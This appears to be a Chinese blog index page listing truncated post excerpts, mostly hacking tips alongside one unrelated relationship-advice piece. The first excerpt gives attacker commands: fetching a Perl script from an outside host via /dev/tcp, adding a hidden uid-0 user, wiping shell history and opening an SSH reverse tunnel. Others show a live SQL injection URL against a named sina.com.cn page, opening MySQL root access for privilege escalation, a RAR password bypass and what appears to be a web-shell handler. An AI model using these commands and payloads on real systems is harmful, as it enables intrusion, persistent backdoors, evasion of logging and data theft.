blueray

摘要： 1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 cnbird3.bash去掉history记录export HISTSIZE=0export HISTFILE=/dev/null4.SSH反向链接ssh -C -f -N -g -R 44:127.0.0.1:22 cnbi 阅读全文

摘要： 不是。真正的感情根本不需要追的。两个人的默契，在慢慢将两颗心的距离缩短，在无意识中渐渐靠近彼此。从好朋友到情人，真正的感情是用不了多久的。从你喜欢上他的那一刻起，也许他也在那一刻喜欢上了你。同节奏的爱情往往能奏出最和谐最动听的乐章。真正的爱情需要什么？需要两个人在一起是轻松快乐的，没有压力。­ 爱一个人就是毫无保留地付出吗？ ­ 不是。每一个人都是一个独立的人，我们首先是属于自己的，我们有思想，我们有个性，而不是把我们的全部都给对方。我们可以有保留，比如你不愿意说的隐私，有秘密的人才是成熟的，不是吗？有时候不说出来反而更好。­外貌和个性哪个更重要？ ­男人年轻的时候往往喜欢漂亮的女子，25岁以 阅读全文

摘要： mysqlbinlog工具的使用,大家可以看MySQL的帮助手册。里面有详细的用，在这个例子中，重点是--start-position参数和--stop-position参数的使用。•--start-position=N从二进制日志中第1个位置等于N参量时的事件开始读。•--stop-position=N从二进制日志中第1个位置等于和大于N参量时的事件起停止读。OK，现在开始，... 阅读全文

摘要： 如果遇到了 服务器开启了 3306 端口，但是不允许root外连的情况，我们可以在shell里面执行如下的语句来开启root用户的外连，方便我们提权。 阅读全文

摘要： 转载:KEVIN默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。几个主要的配置有:ServerComment:我的网站 //站点的名称Server... 阅读全文

摘要： 第一步：用winhex将下面数据生成rar格式的文件。第二步：在winhex中取65h-71h一段数据ctrl+c后粘贴到密码输入框点确定完成秒破。 阅读全文

摘要： RAR加密的原理，是将UNICODE格式的密码，与随机生成的一个8字节的SALT连在一起，根据它生成AES算法的密钥来进行加密。而加密后的RAR中，除了加密后的原压缩内容之外，文件头结构还保存了这个SALT值用于解密。原则上SALT的生成过程跟用户输入时的密码一点关系都没有，因此它本来不保存关于密码的显式信息，但是我们可以对WINRAR程序进行patch，使SALT跟密码发生直接联系，从而使这个S... 阅读全文

摘要： sina注入页面：http://php.baby.sina.com.cn/diary/list.php爆数据库：http://php.baby.sina.com.cn/diary/list.php?netid=5167%20and%201=2%20union%20select%201,2,3,group_concat(schema_name),5,6,7,8,9%20from%20informat... 阅读全文

摘要： using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain... 阅读全文

摘要： 表A+-------------------+|id |user |info ||1 |u1 |991 ||3 |u3 |113 |+-------------------+表B+-------------------+|id |user |pw |pw2 | |1 |u1 |p1 |p12 ||2 |u2 |p2 |p22 ||3 |u3 |p3 |p32 |+-----------------... 阅读全文